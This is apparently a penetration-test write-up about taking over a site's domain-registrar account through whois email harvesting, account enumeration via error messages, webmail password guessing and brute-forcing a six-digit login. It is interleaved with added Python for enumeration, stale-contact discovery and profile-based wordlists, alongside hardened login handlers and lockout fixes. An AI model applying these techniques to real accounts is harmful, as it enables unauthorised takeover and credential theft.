Perform penetration testing like a detective

Tags: domain name registration, nslookup

Author: dangdang
Source: t00ls
 
The target site is aaaaaa.com.
Only the web service is exposed. The site runs WebLogic plus Apache Axis behind Apache; the Axis administration interface should be listening on port 8080, but unfortunately that port is filtered by the firewall. Manual analysis and a scan with the latest WVS (Acunetix Web Vulnerability Scanner) turned up nothing exploitable.
Looking at the home page, I noticed a contact address at the bottom: webmaster@aaaaaa.com. That must be the administrator, so information gathering started from this mailbox. I found mail.aaaaaa.com and tried guessing the password, without success. From the information collected I learned that the mail system was Anymacro; I checked and found no published vulnerability for it. A bit of googling turned up nothing but the same webmaster@aaaaaa.com address -_-, so hunting for an XSS in the webmail by pure black-box testing looked like a lot of work. Since the mail system offered no ready-made starting point, I turned to the aaaaaa.com domain itself. nslookup showed that its name servers were under xxxxxx.com.cn, so the registrar's website is www.xxxxxx.com.cn. In my experience many people use the domain name as their account name, so I tried logging on to the domain management platform with aaaaaa/123456: "password incorrect". Changing the account name to aaaaaa1 gave "this account does not exist". The two different error messages confirm that the account aaaaaa exists, but after a long time spent guessing the password I got nowhere. Next I looked at whether the "retrieve member password" function had a problem. Submitting aaaaaa together with webmaster@aaaaaa.com produced "the registered e-mail address is wrong", so I tried several common forms:
 
aaaaaa@hotmail.com
aaaaaa@163.com
aaaaaa@sina.com
aaaaaa@yahoo.com.cn
aaaaaa@263.com
aaaaaa@sohu.com
aaaaaa@tom.com
...
 
All of them were rejected. So I checked the domain registration information again; I usually use www.checkdomain.com for whois lookups, and it returned the following:
Domain Name: aaaaaa.com
ROID: xxxxxxxxxxxxx
Domain Status: OK
Registrant Organization: Beijing xxxxxxx
Registrant Name: James
Administrative Email: zhangsan@abc123.com
Sponsoring Registrar: Beijing xxxxxxx Network Technology Co., Ltd.
Name Server: ns3.xxxxxx.com.cn
Registration Date:
Expiration Date:
 
zhangsan@abc123.com was the mailbox used at registration, back in 2003! Next I tried aaaaaa together with zhangsan@abc123.com on the "retrieve member password" page, and it answered "Password Sent". Sure enough... Now the problem was how to get into the zhangsan@abc123.com mailbox, and the result was a tragedy: an nslookup query showed that the mail system did not exist:
 
*** Can't find server address for 'abc123.com':
Server:  ns1.cpip.net.cn
Address:  210.73.64.1

DNS request timed out.
    timeout was 2 seconds.
*** Request to ns1.cpip.net.cn timed-out
 
A ping of mail.abc123.com fails as well; the host does not exist -_-
 
Comparing the addresses collected so far, I found that several local parts existed under both @abc123.com and @aaaaaa.com, so I guessed that abc123.com was the organisation's old mail domain, since retired and replaced by the new server mail.aaaaaa.com.
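The reasoning in the last few paragraphs (pull the contact mailbox out of the whois record, notice that its domain no longer resolves, then use local parts that appear under both domains to guess where the same person's mailbox lives now) can be mechanised. The following is an added example, not code from the original post; the whois text and the list of collected addresses are constructed placeholders modelled on the page, and the DNS check is injected as a function so that the example runs offline (`live_resolver` does the real lookup when you have network access). One practitioner's caveat that the page does not spell out: a contact domain that has actually lapsed is worse than a dead one, because whoever registers it receives the reset mail.

```python
import re
import socket
from collections import defaultdict

# Constructed whois record modelled on the one quoted above (placeholder values, not real data).
WHOIS_RECORD = """\
Domain Name: aaaaaa.com
Registrant Organization: Beijing xxxxxxx
Registrant Name: James
Administrative Email: zhangsan@abc123.com
Sponsoring Registrar: Beijing xxxxxxx Network Technology Co., Ltd.
Name Server: ns3.xxxxxx.com.cn
"""

# Constructed set of addresses gathered during recon (search engines, page footers, mail headers).
# zhangsan@aaaaaa.com is deliberately NOT in it: that is the address we want to infer.
COLLECTED_ADDRESSES = [
    "webmaster@aaaaaa.com",
    "lisi@aaaaaa.com",
    "lisi@abc123.com",
    "sales@othercorp.example",
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def contact_emails(whois_text):
    """Unique e-mail addresses in a whois record, lower-cased, in order of appearance."""
    found = []
    for addr in EMAIL_RE.findall(whois_text):
        addr = addr.lower()
        if addr not in found:
            found.append(addr)
    return found


def live_resolver(domain):
    """Real check: does the domain have any address record? Needs network; the test injects a stub."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def locals_by_domain(addresses):
    """{domain: {local parts seen under it}} for the collected addresses."""
    by_domain = defaultdict(set)
    for addr in addresses:
        local, _, domain = addr.lower().partition("@")
        by_domain[domain].add(local)
    return dict(by_domain)


def shared_local_parts(addresses, domain_a, domain_b):
    """Local parts seen under both domains: the evidence used above to conclude that
    abc123.com was the old mail domain of the same organisation."""
    by_domain = locals_by_domain(addresses)
    return sorted(by_domain.get(domain_a, set()) & by_domain.get(domain_b, set()))


def stale_contacts(whois_text, addresses, resolves=live_resolver):
    """For every whois contact whose mail domain no longer resolves, propose where the same
    local part probably lives now: any live domain that shares a local part with the dead one.
    Returns {dead_contact: [candidate_address, ...]} (an empty list means no successor found)."""
    by_domain = locals_by_domain(addresses)
    result = {}
    for addr in contact_emails(whois_text):
        local, _, dead = addr.partition("@")
        if resolves(dead):
            continue
        dead_locals = by_domain.get(dead, set())
        successors = [
            d for d, locs in by_domain.items()
            if d != dead and locs & dead_locals and resolves(d)
        ]
        result[addr] = sorted(f"{local}@{d}" for d in successors)
    return result
```

Run with `stale_contacts(WHOIS_RECORD, COLLECTED_ADDRESSES)` on a networked host to use real DNS; the candidate it proposes for the dead contact is the account to try on the live mail server, which is exactly the step the next paragraph describes.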
The facts confirmed my preliminary judgement. Logging on to mail.aaaaaa.com as zhangsan gave "password incorrect", so the account exists! A few simple guesses showed that zhangsan's password was zhangsan. The mailbox contained only one unread message, and its mail dated from a few months back, which indicates that James seldom checks this address; that suits a social engineering attack. Given these conditions it should also be easy to find an XSS.
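Twice now the story turns on the same weakness: the registrar's login and "retrieve member password" forms, and then the webmail login, each answer differently for "account does not exist", "password incorrect" and "registered e-mail address is wrong", so they act as oracles for which accounts exist and which contact address is on file. The block below is an added example, not code from the post or from either product: `MEMBERS` is a constructed placeholder table (the 177243 value is the one quoted later on the page; everything else is invented), the message strings paraphrase the page, and the two `uniform_*` handlers show the fix, a single response whatever the input.

```python
import hmac
import secrets

# Constructed member table standing in for the registrar's user store (placeholder data).
MEMBERS = {
    "aaaaaa": {"password": "177243", "email": "zhangsan@abc123.com"},
    "bbbbbb": {"password": "830115", "email": "lisi@example.com"},
}

UNIFORM_LOGIN = "Account name or password is incorrect"
UNIFORM_RESET = "If the account and e-mail address match our records, a password mail has been sent"


def leaky_login(account, password):
    """Login handler as the page describes it: it distinguishes unknown accounts from bad passwords."""
    member = MEMBERS.get(account)
    if member is None:
        return "This account does not exist"
    if not hmac.compare_digest(member["password"], password):
        return "Password incorrect"
    return "Login OK"


def leaky_reset(account, email):
    """'Retrieve member password' as the page describes it: three distinguishable answers."""
    member = MEMBERS.get(account)
    if member is None:
        return "This account does not exist"
    if member["email"].lower() != email.lower():
        return "The registered e-mail address is wrong"
    return "Password sent"  # the real handler mails the password at this point


def uniform_login(account, password):
    """Hardened: one message for unknown account and wrong password, and a comparison is
    performed either way so the timing does not leak the difference instead."""
    member = MEMBERS.get(account)
    stored = member["password"] if member is not None else "000000"
    ok = hmac.compare_digest(stored, password) and member is not None
    return "Login OK" if ok else UNIFORM_LOGIN


def uniform_reset(account, email):
    """Hardened: same message regardless; the mail is sent only when both values match."""
    member = MEMBERS.get(account)
    if member is not None and member["email"].lower() == email.lower():
        pass  # send the mail here, and only here
    return UNIFORM_RESET


def enumerate_accounts(handler, candidates, bogus="x-" + secrets.token_hex(8)):
    """Oracle probe. Any candidate whose response differs from that of a surely-nonexistent
    account is reported as existing. Works against any two-argument handler (login or reset)."""
    baseline = handler("no-such-account-" + secrets.token_hex(6), bogus)
    return [acct for acct in candidates if handler(acct, bogus) != baseline]


def find_registered_email(reset, account, candidate_emails):
    """The second oracle, the one used on the page: feed candidate e-mails to the reset form
    for a known account until the response changes. Against the leaky handler the matching
    guess also triggers the real password mail, which is what "Password Sent" meant above."""
    baseline = reset(account, "nobody@invalid.example")
    for email in candidate_emails:
        if reset(account, email) != baseline:
            return email
    return None
```

Note that the hardened handlers still send the mail on a true match; the attacker simply can no longer tell from the response. Equalising the message is necessary but not sufficient: response time (hashing, mail submission) must not differ either, and per-account rate limiting is still needed, since the reset form is otherwise a free, unthrottled oracle.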
 
An XSS was found too, one that hit the other mailboxes as well, but pursuing it is meaningless: our goal is the domain management password for aaaaaa.com. Since the registrar account still uses the old e-mail address, the next idea was to have it changed back. With the information gathered above, a social engineering attack was possible, but it turned out to be hard: from talking with customer service I learned that changing the password through them requires faxing the applicant's telephone number, mobile number, employer, a copy of the ID card and so on, and the applicant's phone number is also called for confirmation. I am not Mitnick; social engineering was not a road I could go down.
That left checking the registrar's own website for vulnerabilities, focusing on manual checks. I registered an account with the registrar and found that the website login password is a random 6-digit number assigned by the system. A 6-digit numeric password is far from unbreakable. Typically the registered users of a registrar's site rarely log on again once the domain is configured, so few of them ever change the login password. From what I had already learned, James seldom logged on to the domain management platform (registered in 2003, contact e-mail still the old one), so there was a high probability that his password was still the system's random 6 digits.
Now the direction of the test was clear: prepare the dictionary (all 1,000,000 six-digit numbers) and a tool to run it. The attack rate held at around 1500 attempts per minute.
While cracking, I kept checking that the website was still running normally. Running the whole dictionary would take about 1000000/1500/60 ≈ 11 hours; in practice the password is usually found before the dictionary is exhausted, and that time was within my acceptable range. In the end I waited only about an hour and the password fell: "177243". Logging on to the website with aaaaaa/177243, the member area has a mydns management menu, but modifying the domain requires a separate password. 177243 was rejected, and so were the common passwords I tried by hand. Then I checked for a stored XSS in a text field and found one in the member information modification page. I could insert an XSS payload there using cross-window hijacking plus function hijacking, lure James into logging on to the domain management platform and modifying his personal information and domain management password, and capture the domain management password that way.
XSS is tactically feasible, but still too troublesome to implement, so I went back to brute-forcing the domain management password. First, "Modify member information" gave me some personal information to build guesses from. The main fields collected were name, telephone, mobile, e-mail address and zip code:
Name: Zhang San (variants: zhangsan, zhangs, zhangsan123, etc.)
Mobile: 1581111111
Tel: 811111111
Zip code: 520520520
 
When I tried the zip code, I finally saw the lovely mydns domain management interface ^_^. That completes the test. It did not involve much technology, but the overall line of thinking is what makes it appealing: with analysis and reasoning layer by layer, step by step, the whole picture became clearer and clearer until the goal was reached. A lot was left out of this write-up, for example the SMTP protocol injection I tried against the mail system's "retrieve password" function, the tests against the registrar's mail server, the many tests against aaaaaa.com itself, and the Google hacking used to collect and verify information; these were removed because they are not important.
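Two password-guessing runs decided this engagement: the exhaustive run over the system-assigned 6-digit login password (1,000,000 candidates at about 1500 per minute) and the short targeted run over the profile fields for the domain management password. The block below is an added example, not the author's tool: it carries the timing estimate through, generates both candidate sets, and runs them against a mock verifier whose `max_failures` setting is the control the registrar was missing. `PROFILE` is a constructed placeholder built from the fields listed above; the name deformations follow the page (zhangsan, zhangs, zhangsan123) and the suffix list is an assumption.

```python
# Constructed profile, modelled on the fields listed above (placeholder values, not real data).
PROFILE = {
    "name": "Zhang San",
    "mobile": "1581111111",
    "tel": "811111111",
    "zip": "520520520",
    "email": "zhangsan@abc123.com",
}


def crack_time_hours(keyspace, attempts_per_minute):
    """(worst case, expected) hours for an online guess at a fixed rate; expected = half the keyspace."""
    worst = keyspace / attempts_per_minute / 60
    return worst, worst / 2


def numeric_candidates(digits=6):
    """Every password of the form the registrar hands out: exactly `digits` decimal digits."""
    return (f"{n:0{digits}d}" for n in range(10 ** digits))


def profile_candidates(profile):
    """Targeted wordlist from the member profile: name deformations first (the order tried on the
    page), then the raw numbers, then name+suffix and name+number combinations."""
    parts = profile["name"].lower().split()
    joined = "".join(parts)
    initials = parts[0] + "".join(p[0] for p in parts[1:])  # "Zhang San" -> "zhangs"
    local = profile.get("email", "").partition("@")[0].lower()
    numbers = [profile[k] for k in ("zip", "mobile", "tel") if profile.get(k)]

    out = []

    def add(cand):
        if cand and cand not in out:
            out.append(cand)

    for w in (joined, initials, parts[0], local):
        add(w)
    words = list(out)
    for n in numbers:
        add(n)
    for w in words:
        for suffix in ("123", "1234", "888", "666"):  # assumed common suffixes
            add(w + suffix)
        for n in numbers:
            add(w + n)
            add(w + n[-4:])
    return out


class Verifier:
    """Mock authentication endpoint. max_failures=None behaves like the page's target (unlimited
    guesses); a finite value locks the account after that many failures, which is the fix."""

    def __init__(self, secret, max_failures=None):
        self.secret, self.max_failures = secret, max_failures
        self.failures, self.locked = 0, False

    def check(self, guess):
        if self.locked:
            return False
        if guess == self.secret:
            return True
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.locked = True
        return False


def guess_online(verifier, candidates):
    """Submit candidates in order; stop on success or lockout. Returns (password or None, attempts)."""
    attempts = 0
    for cand in candidates:
        attempts += 1
        if verifier.check(cand):
            return cand, attempts
        if verifier.locked:
            break
    return None, attempts
```

`crack_time_hours(10 ** 6, 1500)` gives the 11.1-hour worst case the page computes and a 5.6-hour expectation; the one-hour result on the page simply means the number happened to sit early in the sequence. With `max_failures` set to a small number the same run stops after a handful of attempts, and the profile-derived list never gets past the name variants. The other fix the page implies is to force a change of the system-assigned 6-digit password on first login, so that a user who never returns is not left with it for years.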
 
This article is from Frandy's Blog: http://www.52sky.org, article address: http://www.52sky.org/92002.html
 
